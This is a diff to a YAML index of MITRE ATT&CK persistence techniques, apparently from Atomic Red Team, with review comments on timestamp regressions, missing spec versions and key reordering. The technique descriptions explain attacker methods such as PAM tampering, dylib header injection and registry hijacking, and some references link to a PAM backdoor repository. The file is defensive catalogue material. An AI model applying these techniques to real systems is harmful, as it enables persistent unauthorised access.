@@ -30354,8 +30739,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -30369,6 +30754,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -30381,16 +30770,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
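Review bot: `modified` for T1205.002 moves backwards, from `2022-11-08T14:00:00.188Z` to `2022-10-20T19:56:18.579Z`, and the same regression appears for T1133, T1546.006, T1547.014 and T1542.005 later in the patch, while other objects move forward to 2024 dates. The old values share a release-style `T14:00:00.188Z` stamp, which suggests the previous import wrote a release time onto objects that had not changed; worth confirming the new values come from the current ATT&CK release, because anything using `modified` to detect updated techniques will see spurious changes for these entries.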
@@ -30453,7 +30845,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -30518,49 +30909,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -30575,20 +30927,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
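Review bot: beyond the field reorder, the `external_references` list changes order in this hunk: `PAM Creds` now precedes `Red Hat PAM`, whereas the removed block ran `Red Hat PAM`, `PAM Backdoor`, `PAM Creds`. If the generator preserves upstream order this is an upstream change and fine; if it does not, reference order is unstable across regenerations and should be sorted by `source_name` so diffs show only real edits.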
@@ -30678,7 +31067,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -30766,7 +31154,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -30851,11 +31238,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -30933,7 +31319,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -30966,7 +31351,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -30989,11 +31374,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -31051,9 +31435,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -31134,12 +31517,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -31158,7 +31540,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -31172,7 +31553,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -31199,8 +31579,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -31231,7 +31611,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -31288,11 +31669,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -31364,9 +31744,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -31382,12 +31762,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -31462,7 +31841,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -31505,7 +31883,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -31529,8 +31907,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
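Review bot: T1542.005 loses both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` with no replacement `x_mitre_attack_spec_version` added in this hunk, unlike the other objects in the patch that are bumped to 3.2.0 (or keep 3.1.0, as T1542.003 does in `@@ -31288`). Check whether the key is re-added outside this hunk; if not, this object ends up with no spec version at all, on top of its `modified` regressing from `2021-04-29` to `2020-10-22`.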
@@ -31685,31 +32061,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
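Review bot: almost all of this hunk is key reordering for T1053.003 (platforms, domains, object_marking_refs, id, created, external_references all move to later in the object) rather than a content change, which buries the one substantive edit here, the `modified` bump to `2024-10-15T18:45:51.945Z`. If the generator can emit keys in a stable order matching the previous file, diffs of this index become reviewable; as it stands a reviewer has to match removed and re-added blocks by hand to confirm nothing changed in between.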
@@ -31726,6 +32082,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -31736,9 +32093,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -31746,8 +32107,24 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
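Review bot: two new keys appear for T1053.003, `revoked: false` and `x_mitre_remote_support: false`, and the re-emitted `mitre-attack` reference now lists `url` before `external_id`. Neither is a problem by itself, but the PR description should say which generator or ATT&CK release these come from, since the combination (new boolean fields, reordered reference keys, `x_mitre_version` 1.1 to 1.2 in the previous hunk) reads as a wholesale re-export rather than a targeted edit.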
@@ -31812,11 +32189,15 @@ persistence:
rm /etc/cron.weekly/#{cron_script_name} -f
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
@@ -31824,79 +32205,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
